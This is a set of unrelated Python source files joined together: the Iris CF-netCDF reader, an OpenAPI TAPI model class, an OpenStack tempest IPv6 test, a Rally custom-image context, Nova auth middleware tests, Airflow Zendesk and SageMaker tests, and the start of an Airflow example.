"""Collection of CF-netCDF grid mapping variables."""
return self._cf_getter(CFGridMappingVariable)
@property
def labels(self):
"""Collection of CF-netCDF label variables."""
return self._cf_getter(CFLabelVariable)
@property
def cell_measures(self):
"""Collection of CF-netCDF measure variables."""
return self._cf_getter(CFMeasureVariable)
@property
def non_data_variable_names(self):
"""
:class:`set` of the names of the CF-netCDF variables that are not
the data pay-load.
"""
non_data_variables = (
self.ancillary_variables,
self.auxiliary_coordinates,
self.bounds,
self.climatology,
self.coordinates,
self.grid_mappings,
self.labels,
self.cell_measures,
)
result = set()
for variable in non_data_variables:
result |= set(variable)
return result
def keys(self):
"""Return the names of all the CF-netCDF variables in the group."""
return self._cf_variables.keys()
def __len__(self):
return len(self._cf_variables)
def __iter__(self):
for item in self._cf_variables:
yield item
def __setitem__(self, name, variable):
if not isinstance(variable, CFVariable):
raise TypeError(
"Attempted to add an invalid CF-netCDF variable to the %s"
% self.__class__.__name__
)
if name != variable.cf_name:
raise ValueError(
"Mismatch between key name %r and CF-netCDF variable name %r"
% (str(name), variable.cf_name)
)
self._cf_variables[name] = variable
def __getitem__(self, name):
if name not in self._cf_variables:
raise KeyError(
"Cannot get unknown CF-netCDF variable name %r" % str(name)
)
return self._cf_variables[name]
def __delitem__(self, name):
if name not in self._cf_variables:
raise KeyError(
"Cannot delete unknown CF-netcdf variable name %r" % str(name)
)
del self._cf_variables[name]
def __repr__(self):
result = []
result.append("variables:%d" % len(self._cf_variables))
result.append("global_attributes:%d" % len(self.global_attributes))
result.append("promoted:%d" % len(self.promoted))
return "<%s of %s>" % (self.__class__.__name__, ", ".join(result))
class CFReader:
"""
This class allows the contents of a netCDF file to be interpreted according
to the 'NetCDF Climate and Forecast (CF) Metadata Conventions'.
"""
# All CF variable types EXCEPT for the "special cases" of
# CFDataVariable, CFCoordinateVariable and _CFFormulaTermsVariable.
_variable_types = (
CFAncillaryDataVariable,
CFAuxiliaryCoordinateVariable,
CFBoundaryVariable,
CFClimatologyVariable,
CFGridMappingVariable,
CFLabelVariable,
CFMeasureVariable,
)
# TODO: remove once iris.experimental.ugrid.CFUGridReader is folded in.
CFGroup = CFGroup
def __init__(self, filename, warn=False, monotonic=False):
self._filename = os.path.expanduser(filename)
#: Collection of CF-netCDF variables associated with this netCDF file
self.cf_group = self.CFGroup()
self._dataset = netCDF4.Dataset(self._filename, mode="r")
# Issue load optimisation warning.
if warn and self._dataset.file_format in [
"NETCDF3_CLASSIC",
"NETCDF3_64BIT",
]:
warnings.warn(
"Optimise CF-netCDF loading by converting data from NetCDF3 "
'to NetCDF4 file format using the "nccopy" command.'
)
self._check_monotonic = monotonic
self._translate()
self._build_cf_groups()
self._reset()
@property
def filename(self):
"""The file that the CFReader is reading."""
return self._filename
def __repr__(self):
return "%s(%r)" % (self.__class__.__name__, self._filename)
def _translate(self):
"""Classify the netCDF variables into CF-netCDF variables."""
netcdf_variable_names = list(self._dataset.variables.keys())
# Identify all CF coordinate variables first. This must be done
# first as, by CF convention, the definition of a CF auxiliary
# coordinate variable may include a scalar CF coordinate variable,
# whereas we want these two types of variables to be mutually exclusive.
coords = CFCoordinateVariable.identify(
self._dataset.variables, monotonic=self._check_monotonic
)
self.cf_group.update(coords)
coordinate_names = list(self.cf_group.coordinates.keys())
# Identify all CF variables EXCEPT for the "special cases".
for variable_type in self._variable_types:
# Prevent grid mapping variables being mis-identified as CF coordinate variables.
ignore = (
None
if issubclass(variable_type, CFGridMappingVariable)
else coordinate_names
)
self.cf_group.update(
variable_type.identify(self._dataset.variables, ignore=ignore)
)
# Identify global netCDF attributes.
attr_dict = {
attr_name: _getncattr(self._dataset, attr_name, "")
for attr_name in self._dataset.ncattrs()
}
self.cf_group.global_attributes.update(attr_dict)
# Identify and register all CF formula terms.
formula_terms = _CFFormulaTermsVariable.identify(
self._dataset.variables
)
for cf_var in formula_terms.values():
for cf_root, cf_term in cf_var.cf_terms_by_root.items():
# Ignore formula terms owned by a bounds variable.
if cf_root not in self.cf_group.bounds:
cf_name = cf_var.cf_name
if cf_var.cf_name not in self.cf_group:
self.cf_group[cf_name] = CFAuxiliaryCoordinateVariable(
cf_name, cf_var.cf_data
)
self.cf_group[cf_name].add_formula_term(cf_root, cf_term)
# Determine the CF data variables.
data_variable_names = (
set(netcdf_variable_names) - self.cf_group.non_data_variable_names
)
for name in data_variable_names:
self.cf_group[name] = CFDataVariable(
name, self._dataset.variables[name]
)
def _build_cf_groups(self):
"""Build the first order relationships between CF-netCDF variables."""
def _build(cf_variable):
# TODO: isinstance(cf_variable, UGridMeshVariable)
# UGridMeshVariable currently in experimental.ugrid - circular import.
is_mesh_var = cf_variable.cf_identity == "mesh"
ugrid_coord_names = []
ugrid_coords = getattr(self.cf_group, "ugrid_coords", None)
if ugrid_coords is not None:
ugrid_coord_names = list(ugrid_coords.keys())
coordinate_names = list(self.cf_group.coordinates.keys())
cf_group = self.CFGroup()
# Build CF variable relationships.
for variable_type in self._variable_types:
ignore = []
# Avoid UGridAuxiliaryCoordinateVariables also being
# processed as CFAuxiliaryCoordinateVariables.
if not is_mesh_var:
ignore += ugrid_coord_names
# Prevent grid mapping variables being mis-identified as CF coordinate variables.
if not issubclass(variable_type, CFGridMappingVariable):
ignore += coordinate_names
match = variable_type.identify(
self._dataset.variables,
ignore=ignore,
target=cf_variable.cf_name,
warn=False,
)
# Sanity check dimensionality coverage.
for cf_name, cf_var in match.items():
# No span check is necessary if variable is attached to a mesh.
if is_mesh_var or cf_var.spans(cf_variable):
cf_group[cf_name] = self.cf_group[cf_name]
else:
# Register the ignored variable.
# N.B. 'ignored' variable from enclosing scope.
ignored.add(cf_name)
msg = (
"Ignoring variable {!r} referenced "
"by variable {!r}: Dimensions {!r} do not "
"span {!r}".format(
cf_name,
cf_variable.cf_name,
cf_var.dimensions,
cf_variable.dimensions,
)
)
warnings.warn(msg)
# Build CF data variable relationships.
if isinstance(cf_variable, CFDataVariable):
# Add global netCDF attributes.
cf_group.global_attributes.update(
self.cf_group.global_attributes
)
# Add appropriate "dimensioned" CF coordinate variables.
cf_group.update(
{
cf_name: self.cf_group[cf_name]
for cf_name in cf_variable.dimensions
if cf_name in self.cf_group.coordinates
}
)
# Add appropriate "dimensionless" CF coordinate variables.
coordinates_attr = getattr(cf_variable, "coordinates", "")
cf_group.update(
{
cf_name: self.cf_group[cf_name]
for cf_name in coordinates_attr.split()
if cf_name in self.cf_group.coordinates
}
)
# Add appropriate formula terms.
for cf_var in self.cf_group.formula_terms.values():
for cf_root in cf_var.cf_terms_by_root:
if (
cf_root in cf_group
and cf_var.cf_name not in cf_group
):
# Sanity check dimensionality.
if cf_var.spans(cf_variable):
cf_group[cf_var.cf_name] = cf_var
else:
# Register the ignored variable.
# N.B. 'ignored' variable from enclosing scope.
ignored.add(cf_var.cf_name)
msg = (
"Ignoring formula terms variable {!r} "
"referenced by data variable {!r} via "
"variable {!r}: Dimensions {!r} do not "
"span {!r}".format(
cf_var.cf_name,
cf_variable.cf_name,
cf_root,
cf_var.dimensions,
cf_variable.dimensions,
)
)
warnings.warn(msg)
# Add the CF group to the variable.
cf_variable.cf_group = cf_group
# Ignored variables are those that cannot be attached to a
# data variable as the dimensionality of that variable is not
# a subset of the dimensionality of the data variable.
ignored = set()
for cf_variable in self.cf_group.values():
_build(cf_variable)
# Determine whether there are any formula terms that
# may be promoted to a CFDataVariable and restrict promotion to only
# those formula terms that are reference surface/phenomenon.
for cf_var in self.cf_group.formula_terms.values():
for cf_root, cf_term in cf_var.cf_terms_by_root.items():
cf_root_var = self.cf_group[cf_root]
name = cf_root_var.standard_name or cf_root_var.long_name
terms = reference_terms.get(name, [])
if isinstance(terms, str) or not isinstance(terms, Iterable):
terms = [terms]
cf_var_name = cf_var.cf_name
if (
cf_term in terms
and cf_var_name not in self.cf_group.promoted
):
data_var = CFDataVariable(cf_var_name, cf_var.cf_data)
self.cf_group.promoted[cf_var_name] = data_var
_build(data_var)
break
# Promote any ignored variables.
promoted = set()
not_promoted = ignored.difference(promoted)
while not_promoted:
cf_name = not_promoted.pop()
if (
cf_name not in self.cf_group.data_variables
and cf_name not in self.cf_group.promoted
):
data_var = CFDataVariable(
cf_name, self.cf_group[cf_name].cf_data
)
self.cf_group.promoted[cf_name] = data_var
_build(data_var)
# Determine whether there are still any ignored variables
# yet to be promoted.
promoted.add(cf_name)
not_promoted = ignored.difference(promoted)
def _reset(self):
"""Reset the attribute touch history of each variable."""
for nc_var_name in self._dataset.variables.keys():
self.cf_group[nc_var_name].cf_attrs_reset()
def __del__(self):
# Explicitly close dataset to prevent file remaining open.
self._dataset.close()
def _getncattr(dataset, attr, default=None):
"""
Simple wrapper round `netCDF4.Dataset.getncattr` to make it behave
more like `getattr`.
"""
try:
value = dataset.getncattr(attr)
except AttributeError:
value = default
return value
|
from __future__ import absolute_import
from datetime import date, datetime # noqa: F401
from typing import List, Dict # noqa: F401
from tapi_server.models.base_model_ import Model
from tapi_server.models.tapi_photonic_media_media_channel_properties_pac import TapiPhotonicMediaMediaChannelPropertiesPac # noqa: F401,E501
from tapi_server import util
class TapiPhotonicMediaOtsConnectionEndPointSpec(Model):
"""NOTE: This class is auto generated by OpenAPI Generator (https://openapi-generator.tech).
Do not edit the class manually.
"""
def __init__(self, ots_media_channel=None): # noqa: E501
"""TapiPhotonicMediaOtsConnectionEndPointSpec - a model defined in OpenAPI
:param ots_media_channel: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec. # noqa: E501
:type ots_media_channel: TapiPhotonicMediaMediaChannelPropertiesPac
"""
self.openapi_types = {
'ots_media_channel': TapiPhotonicMediaMediaChannelPropertiesPac
}
self.attribute_map = {
'ots_media_channel': 'ots-media-channel'
}
self._ots_media_channel = ots_media_channel
@classmethod
def from_dict(cls, dikt) -> 'TapiPhotonicMediaOtsConnectionEndPointSpec':
"""Returns the dict as a model
:param dikt: A dict.
:type: dict
:return: The tapi.photonic.media.OtsConnectionEndPointSpec of this TapiPhotonicMediaOtsConnectionEndPointSpec. # noqa: E501
:rtype: TapiPhotonicMediaOtsConnectionEndPointSpec
"""
return util.deserialize_model(dikt, cls)
@property
def ots_media_channel(self):
"""Gets the ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:return: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:rtype: TapiPhotonicMediaMediaChannelPropertiesPac
"""
return self._ots_media_channel
@ots_media_channel.setter
def ots_media_channel(self, ots_media_channel):
"""Sets the ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:param ots_media_channel: The ots_media_channel of this TapiPhotonicMediaOtsConnectionEndPointSpec.
:type ots_media_channel: TapiPhotonicMediaMediaChannelPropertiesPac
"""
self._ots_media_channel = ots_media_channel
|
import netaddr
from tempest import config
from tempest.openstack.common import log as logging
from tempest.scenario import manager
from tempest import test
CONF = config.CONF
LOG = logging.getLogger(__name__)
class TestGettingAddress(manager.NetworkScenarioTest):
"""Create network with 2 subnets: IPv4 and IPv6 in a given address mode
Boot 2 VMs on this network
Allocate and assign 2 FIP4
Check that vNIC of server matches port data from OpenStack DB
Ping4 tenant IPv4 of one VM from another one
Will do the same with ping6 when available in VM
"""
@classmethod
def resource_setup(cls):
# Create no network resources for these tests.
cls.set_network_resources()
super(TestGettingAddress, cls).resource_setup()
@classmethod
def check_preconditions(cls):
if not (CONF.network_feature_enabled.ipv6
and CONF.network_feature_enabled.ipv6_subnet_attributes):
raise cls.skipException('IPv6 or its attributes not supported')
if not (CONF.network.tenant_networks_reachable
or CONF.network.public_network_id):
msg = ('Either tenant_networks_reachable must be "true", or '
'public_network_id must be defined.')
raise cls.skipException(msg)
if CONF.baremetal.driver_enabled:
msg = ('Baremetal does not currently support network isolation')
raise cls.skipException(msg)
super(TestGettingAddress, cls).check_preconditions()
def setUp(self):
super(TestGettingAddress, self).setUp()
self.keypair = self.create_keypair()
self.sec_grp = self._create_security_group(tenant_id=self.tenant_id)
self.srv_kwargs = {
'key_name': self.keypair['name'],
'security_groups': [{'name': self.sec_grp['name']}]}
def prepare_network(self, address6_mode):
"""Creates network with
one IPv6 subnet in the given mode and
one IPv4 subnet
Creates router with ports on both subnets
"""
self.network = self._create_network(tenant_id=self.tenant_id)
sub4 = self._create_subnet(network=self.network,
namestart='sub4',
ip_version=4,)
# since https://bugs.launchpad.net/neutron/+bug/1394112 we need
# to specify gateway_ip manually
net_range = netaddr.IPNetwork(CONF.network.tenant_network_v6_cidr)
gateway_ip = (netaddr.IPAddress(net_range) + 1).format()
sub6 = self._create_subnet(network=self.network,
namestart='sub6',
ip_version=6,
gateway_ip=gateway_ip,
ipv6_ra_mode=address6_mode,
ipv6_address_mode=address6_mode)
router = self._get_router(tenant_id=self.tenant_id)
sub4.add_to_router(router_id=router['id'])
sub6.add_to_router(router_id=router['id'])
self.addCleanup(sub4.delete)
self.addCleanup(sub6.delete)
@staticmethod
def define_server_ips(srv):
for net_name, nics in srv['addresses'].iteritems():
for nic in nics:
if nic['version'] == 6:
srv['accessIPv6'] = nic['addr']
else:
srv['accessIPv4'] = nic['addr']
def prepare_server(self):
username = CONF.compute.image_ssh_user
create_kwargs = self.srv_kwargs
create_kwargs['networks'] = [{'uuid': self.network.id}]
srv = self.create_server(create_kwargs=create_kwargs)
fip = self.create_floating_ip(thing=srv)
self.define_server_ips(srv=srv)
ssh = self.get_remote_client(
server_or_ip=fip.floating_ip_address,
username=username)
return ssh, srv
def _prepare_and_test(self, address6_mode):
self.prepare_network(address6_mode=address6_mode)
ssh1, srv1 = self.prepare_server()
ssh2, srv2 = self.prepare_server()
result = ssh1.get_ip_list()
self.assertIn(srv1['accessIPv4'], result)
# v6 should be configured since the image supports it
self.assertIn(srv1['accessIPv6'], result)
result = ssh2.get_ip_list()
self.assertIn(srv2['accessIPv4'], result)
# v6 should be configured since the image supports it
self.assertIn(srv2['accessIPv6'], result)
result = ssh1.ping_host(srv2['accessIPv4'])
self.assertIn('0% packet loss', result)
result = ssh2.ping_host(srv1['accessIPv4'])
self.assertIn('0% packet loss', result)
# Some VM (like cirros) may not have ping6 utility
result = ssh1.exec_command('whereis ping6')
is_ping6 = False if result == 'ping6:\n' else True
if is_ping6:
result = ssh1.ping_host(srv2['accessIPv6'])
self.assertIn('0% packet loss', result)
result = ssh2.ping_host(srv1['accessIPv6'])
self.assertIn('0% packet loss', result)
else:
LOG.warning('Ping6 is not available, skipping')
@test.services('compute', 'network')
def test_slaac_from_os(self):
self._prepare_and_test(address6_mode='slaac')
@test.services('compute', 'network')
def test_dhcp6_stateless_from_os(self):
self._prepare_and_test(address6_mode='dhcpv6-stateless')
|
import abc
import six
from rally.common import broker
from rally.common.i18n import _
from rally.common import log as logging
from rally.common import utils
from rally import consts
from rally import osclients
from rally.plugins.openstack.scenarios.nova import utils as nova_utils
from rally.plugins.openstack.scenarios.vm import vmtasks
from rally.task import context
from rally.task import types
LOG = logging.getLogger(__name__)
@six.add_metaclass(abc.ABCMeta)
@context.configure(name="custom_image", order=500, hidden=True)
class BaseCustomImageGenerator(context.Context):
"""Base class for the contexts providing customized image with.
Every context class for the specific customization must implement
the method `_customize_image` that is able to connect to the server
using SSH and e.g. install applications inside it.
This is used e.g. to install the benchmark application using SSH
access.
This base context class provides a way to prepare an image with
custom preinstalled applications. Basically, this code boots a VM, calls
the `_customize_image` and then snapshots the VM disk, removing the VM
afterwards. The image UUID is stored in the user["custom_image"]["id"]
and can be used afterwards by scenario.
"""
CONFIG_SCHEMA = {
"type": "object",
"$schema": consts.JSON_SCHEMA,
"properties": {
"image": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
}
},
"flavor": {
"type": "object",
"properties": {
"name": {
"type": "string"
}
}
},
"username": {
"type": "string"
},
"password": {
"type": "string"
},
"floating_network": {
"type": "string"
},
"internal_network": {
"type": "string"
},
"port": {
"type": "integer",
"minimum": 1,
"maximum": 65535
},
"userdata": {
"type": "string"
},
"workers": {
"type": "integer",
"minimum": 1,
}
},
"required": ["image", "flavor"],
"additionalProperties": False
}
DEFAULT_CONFIG = {
"username": "root",
"port": 22,
"workers": 1
}
@utils.log_task_wrapper(LOG.info, _("Enter context: `custom_image`"))
def setup(self):
"""Creates custom image(s) with preinstalled applications.
When admin is present creates one public image that is usable
from all the tenants and users. Otherwise create one image
per user and tenant.
"""
if "admin" in self.context:
# NOTE(pboldin): Create by first user and make it public by
# the admin
user = self.context["users"][0]
tenant = self.context["tenants"][user["tenant_id"]]
nics = None
if "networks" in tenant:
nics = [{"net-id": tenant["networks"][0]["id"]}]
custom_image = self.create_one_image(user, nics=nics)
self.make_image_public(custom_image)
for tenant in self.context["tenants"].values():
tenant["custom_image"] = custom_image
else:
def publish(queue):
users = self.context.get("users", [])
for user, tenant_id in utils.iterate_per_tenants(users):
queue.append((user, tenant_id))
def consume(cache, args):
user, tenant_id = args
tenant = self.context["tenants"][tenant_id]
tenant["custom_image"] = self.create_one_image(user)
broker.run(publish, consume, self.config["workers"])
def create_one_image(self, user, **kwargs):
"""Create one image for the user."""
clients = osclients.Clients(user["endpoint"])
image_id = types.ImageResourceType.transform(
clients=clients, resource_config=self.config["image"])
flavor_id = types.FlavorResourceType.transform(
clients=clients, resource_config=self.config["flavor"])
vm_scenario = vmtasks.VMTasks(self.context, clients=clients)
server, fip = vm_scenario._boot_server_with_fip(
name=vm_scenario._generate_random_name("rally_ctx_custom_image_"),
image=image_id, flavor=flavor_id,
floating_network=self.config.get("floating_network"),
userdata=self.config.get("userdata"),
key_name=user["keypair"]["name"],
security_groups=[user["secgroup"]["name"]],
**kwargs)
LOG.debug("Installing benchmark on %r %s", server, fip["ip"])
self.customize_image(server, fip, user)
LOG.debug("Stopping server %r", server)
vm_scenario._stop_server(server)
LOG.debug("Creating snapshot for %r", server)
custom_image = vm_scenario._create_image(server).to_dict()
vm_scenario._delete_server_with_fip(server, fip)
return custom_image
def make_image_public(self, custom_image):
"""Make the image available publicly."""
admin_clients = osclients.Clients(self.context["admin"]["endpoint"])
LOG.debug("Making image %r public", custom_image["id"])
admin_clients.glance().images.get(
custom_image["id"]).update(is_public=True)
@utils.log_task_wrapper(LOG.info, _("Exit context: `custom_image`"))
def cleanup(self):
"""Delete created custom image(s)."""
if "admin" in self.context:
user = self.context["users"][0]
tenant = self.context["tenants"][user["tenant_id"]]
if "custom_image" in tenant:
self.delete_one_image(user, tenant["custom_image"])
tenant.pop("custom_image")
else:
def publish(queue):
users = self.context.get("users", [])
for user, tenant_id in utils.iterate_per_tenants(users):
queue.append((user, tenant_id))
def consume(cache, args):
user, tenant_id = args
tenant = self.context["tenants"][tenant_id]
if "custom_image" in tenant:
self.delete_one_image(user, tenant["custom_image"])
tenant.pop("custom_image")
broker.run(publish, consume, self.config["workers"])
def delete_one_image(self, user, custom_image):
"""Delete the image created for the user and tenant."""
clients = osclients.Clients(user["endpoint"])
nova_scenario = nova_utils.NovaScenario(
context=self.context, clients=clients)
with logging.ExceptionLogger(
LOG, _("Unable to delete image %s") % custom_image["id"]):
custom_image = nova_scenario.clients("nova").images.get(
custom_image["id"])
nova_scenario._delete_image(custom_image)
@utils.log_task_wrapper(LOG.info,
_("Custom image context: customizing"))
def customize_image(self, server, ip, user):
return self._customize_image(server, ip, user)
@abc.abstractmethod
def _customize_image(self, server, ip, user):
"""Override this method with one that customizes image.
Basically, code can simply call `VMScenario._run_command` function
specifying an installation script and interpreter. This script will
be then executed using SSH.
:param server: nova.Server instance
:param ip: dict with server IP details
:param user: user who started a VM instance. Used to extract keypair
"""
pass
|
__author__ = 'rabitdash'
|
from oslo.config import cfg
from oslo.middleware import request_id
from oslo.serialization import jsonutils
import webob
import webob.exc
import nova.api.auth
from nova.i18n import _
from nova import test
CONF = cfg.CONF
class TestNovaKeystoneContextMiddleware(test.NoDBTestCase):
def setUp(self):
super(TestNovaKeystoneContextMiddleware, self).setUp()
@webob.dec.wsgify()
def fake_app(req):
self.context = req.environ['nova.context']
return webob.Response()
self.context = None
self.middleware = nova.api.auth.NovaKeystoneContext(fake_app)
self.request = webob.Request.blank('/')
self.request.headers['X_TENANT_ID'] = 'testtenantid'
self.request.headers['X_AUTH_TOKEN'] = 'testauthtoken'
self.request.headers['X_SERVICE_CATALOG'] = jsonutils.dumps({})
def test_no_user_or_user_id(self):
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '401 Unauthorized')
def test_user_id_only(self):
self.request.headers['X_USER_ID'] = 'testuserid'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuserid')
def test_user_only(self):
self.request.headers['X_USER'] = 'testuser'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuser')
def test_user_id_trumps_user(self):
self.request.headers['X_USER_ID'] = 'testuserid'
self.request.headers['X_USER'] = 'testuser'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 OK')
self.assertEqual(self.context.user_id, 'testuserid')
def test_invalid_service_catalog(self):
self.request.headers['X_USER'] = 'testuser'
self.request.headers['X_SERVICE_CATALOG'] = "bad json"
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '500 Internal Server Error')
def test_request_id_extracted_from_env(self):
req_id = 'dummy-request-id'
self.request.headers['X_PROJECT_ID'] = 'testtenantid'
self.request.headers['X_USER_ID'] = 'testuserid'
self.request.environ[request_id.ENV_REQUEST_ID] = req_id
self.request.get_response(self.middleware)
self.assertEqual(req_id, self.context.request_id)
class TestKeystoneMiddlewareRoles(test.NoDBTestCase):
def setUp(self):
super(TestKeystoneMiddlewareRoles, self).setUp()
@webob.dec.wsgify()
def role_check_app(req):
context = req.environ['nova.context']
if "knight" in context.roles and "bad" not in context.roles:
return webob.Response(status="200 Role Match")
elif context.roles == ['']:
return webob.Response(status="200 No Roles")
else:
raise webob.exc.HTTPBadRequest(_("unexpected role header"))
self.middleware = nova.api.auth.NovaKeystoneContext(role_check_app)
self.request = webob.Request.blank('/')
self.request.headers['X_USER'] = 'testuser'
self.request.headers['X_TENANT_ID'] = 'testtenantid'
self.request.headers['X_AUTH_TOKEN'] = 'testauthtoken'
self.request.headers['X_SERVICE_CATALOG'] = jsonutils.dumps({})
self.roles = "pawn, knight, rook"
def test_roles(self):
self.request.headers['X_ROLES'] = 'pawn,knight,rook'
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 Role Match')
def test_roles_empty(self):
self.request.headers['X_ROLES'] = ''
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 No Roles')
def test_no_role_headers(self):
# Test with no role headers set.
response = self.request.get_response(self.middleware)
self.assertEqual(response.status, '200 No Roles')
class TestPipeLineFactory(test.NoDBTestCase):
class FakeFilter(object):
def __init__(self, name):
self.name = name
self.obj = None
def __call__(self, obj):
self.obj = obj
return self
class FakeApp(object):
def __init__(self, name):
self.name = name
class FakeLoader():
def get_filter(self, name):
return TestPipeLineFactory.FakeFilter(name)
def get_app(self, name):
return TestPipeLineFactory.FakeApp(name)
def _test_pipeline(self, pipeline, app):
for p in pipeline.split()[:-1]:
self.assertEqual(app.name, p)
self.assertIsInstance(app, TestPipeLineFactory.FakeFilter)
app = app.obj
self.assertEqual(app.name, pipeline.split()[-1])
self.assertIsInstance(app, TestPipeLineFactory.FakeApp)
def test_pipeline_factory(self):
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, noauth=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_v21(self):
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory_v21(
TestPipeLineFactory.FakeLoader(), None, noauth=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_with_rate_limits(self):
CONF.set_override('api_rate_limit', True)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_without_rate_limits(self):
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline1 = 'test1 test2 test3'
fake_pipeline2 = 'test4 test5 test6'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None,
keystone_nolimit=fake_pipeline1,
keystone=fake_pipeline2)
self._test_pipeline(fake_pipeline1, app)
def test_pipeline_factory_missing_nolimits_pipeline(self):
CONF.set_override('api_rate_limit', False)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 test2 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline(fake_pipeline, app)
def test_pipeline_factory_compatibility_with_v3(self):
CONF.set_override('api_rate_limit', True)
CONF.set_override('auth_strategy', 'keystone')
fake_pipeline = 'test1 ratelimit_v3 test3'
app = nova.api.auth.pipeline_factory(
TestPipeLineFactory.FakeLoader(), None, keystone=fake_pipeline)
self._test_pipeline('test1 test3', app)
|
from unittest.mock import patch
import pytest
from zenpy.lib.api_objects import Ticket
from airflow.models import Connection
from airflow.providers.zendesk.hooks.zendesk import ZendeskHook
from airflow.utils import db
class TestZendeskHook:
conn_id = 'zendesk_conn_id_test'
@pytest.fixture(autouse=True)
def init_connection(self):
db.merge_conn(
Connection(
conn_id=self.conn_id,
conn_type='zendesk',
host='yoursubdomain.zendesk.com',
login='user@gmail.com',
password='eb243592-faa2-4ba2-a551q-1afdf565c889',
)
)
self.hook = ZendeskHook(zendesk_conn_id=self.conn_id)
def test_hook_init_and_get_conn(self):
# Verify config of zenpy APIs
zenpy_client = self.hook.get_conn()
assert zenpy_client.users.subdomain == 'yoursubdomain'
assert zenpy_client.users.domain == 'zendesk.com'
assert zenpy_client.users.session.auth == ('user@gmail.com', 'eb243592-faa2-4ba2-a551q-1afdf565c889')
assert not zenpy_client.cache.disabled
assert self.hook._ZendeskHook__url == 'https://yoursubdomain.zendesk.com'
def test_get_ticket(self):
zenpy_client = self.hook.get_conn()
with patch.object(zenpy_client, 'tickets') as tickets_mock:
self.hook.get_ticket(ticket_id=1)
tickets_mock.assert_called_once_with(id=1)
def test_search_tickets(self):
zenpy_client = self.hook.get_conn()
with patch.object(zenpy_client, 'search') as search_mock:
self.hook.search_tickets(status='open', sort_order='desc')
search_mock.assert_called_once_with(type='ticket', status='open', sort_order='desc')
def test_create_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to create")
with patch.object(zenpy_client.tickets, 'create') as search_mock:
self.hook.create_tickets(ticket, extra_parameter="extra_parameter")
search_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
def test_update_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to update")
with patch.object(zenpy_client.tickets, 'update') as search_mock:
self.hook.update_tickets(ticket, extra_parameter="extra_parameter")
search_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
def test_delete_tickets(self):
zenpy_client = self.hook.get_conn()
ticket = Ticket(subject="This is a test ticket to delete")
with patch.object(zenpy_client.tickets, 'delete') as search_mock:
self.hook.delete_tickets(ticket, extra_parameter="extra_parameter")
search_mock.assert_called_once_with(ticket, extra_parameter="extra_parameter")
|
import unittest
import mock
from airflow.exceptions import AirflowException
from airflow.providers.amazon.aws.hooks.sagemaker import SageMakerHook
from airflow.providers.amazon.aws.sensors.sagemaker_endpoint import SageMakerEndpointSensor
DESCRIBE_ENDPOINT_CREATING_RESPONSE = {
'EndpointStatus': 'Creating',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
DESCRIBE_ENDPOINT_INSERVICE_RESPONSE = {
'EndpointStatus': 'InService',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
DESCRIBE_ENDPOINT_FAILED_RESPONSE = {
'EndpointStatus': 'Failed',
'ResponseMetadata': {
'HTTPStatusCode': 200,
},
'FailureReason': 'Unknown'
}
DESCRIBE_ENDPOINT_UPDATING_RESPONSE = {
'EndpointStatus': 'Updating',
'ResponseMetadata': {
'HTTPStatusCode': 200,
}
}
class TestSageMakerEndpointSensor(unittest.TestCase):
@mock.patch.object(SageMakerHook, 'get_conn')
@mock.patch.object(SageMakerHook, 'describe_endpoint')
def test_sensor_with_failure(self, mock_describe, mock_get_conn):
mock_describe.side_effect = [DESCRIBE_ENDPOINT_FAILED_RESPONSE]
sensor = SageMakerEndpointSensor(
task_id='test_task',
poke_interval=1,
aws_conn_id='aws_test',
endpoint_name='test_job_name'
)
self.assertRaises(AirflowException, sensor.execute, None)
mock_describe.assert_called_once_with('test_job_name')
@mock.patch.object(SageMakerHook, 'get_conn')
@mock.patch.object(SageMakerHook, '__init__')
@mock.patch.object(SageMakerHook, 'describe_endpoint')
def test_sensor(self, mock_describe, hook_init, mock_get_conn):
hook_init.return_value = None
mock_describe.side_effect = [
DESCRIBE_ENDPOINT_CREATING_RESPONSE,
DESCRIBE_ENDPOINT_UPDATING_RESPONSE,
DESCRIBE_ENDPOINT_INSERVICE_RESPONSE
]
sensor = SageMakerEndpointSensor(
task_id='test_task',
poke_interval=1,
aws_conn_id='aws_test',
endpoint_name='test_job_name'
)
sensor.execute(None)
# make sure we called 3 times(terminated when its completed)
self.assertEqual(mock_describe.call_count, 3)
# make sure the hook was initialized with the specific params
calls = [
mock.call(aws_conn_id='aws_test'),
mock.call(aws_conn_id='aws_test'),
mock.call(aws_conn_id='aws_test')
]
hook_init.assert_has_calls(calls)
if __name__ == '__main__':
unittest.main()
|
"""
Example Airflow DAG for Google Cloud Memorystore service.
"""
import os
from urllib.parse import urlparse
